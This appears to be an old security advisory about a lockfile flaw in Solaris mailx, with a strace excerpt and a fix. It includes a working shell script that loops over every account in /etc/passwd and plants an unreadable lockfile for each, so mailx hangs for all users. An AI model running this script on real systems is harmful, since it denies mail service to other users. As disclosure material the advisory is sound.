Vulnerability

    mailx

Affected

    Solaris

Description

    'optyx; found following.  When mailx is run it creates a  lockfile
    in /var/mail and links it to /var/mail/username.lock

        open("/var/mail/rootSxa4Mv", O_RDWR|O_CREAT|O_EXCL, 0600) = 4
        link("/var/mail/rootSxa4Mv", "/var/mail/root.lock") = 0

    If the file /var/mail/username.lock  exists and it can  delete the
    file,  mailx  will  hang  for  a  while  then  exit,  deleting the
    /var/mail/username.lock file.

    If the file /var/mail/username.lock exists and cannot be  deleted,
    mailx will  hang and  not exit.   The user  can control-C  out  of
    mailx.

    An example shell script follows.

        #!/bin/sh
        # Solaris mailx(1) username.lock proof of theory
        # makes mailx not work for all users except
        # those that can erase the lockfile
        # even so mailx will hang for a long time
        # Tested on Solaris 2.6, 7, 8
        # by Optyx <optyx@uberhax0r.net>
        # http://www.uberhax0r.net
        echo "mailx-lock by optyx. http://www.uberhax0r.net"
        for x in `cat /etc/passwd | cut -d':' -f1`;do
        touch /var/mail/$x.lock
        chmod 0 /var/mail/$x.lock
        done

Solution

    To fix this rm /var/mail/*.lock.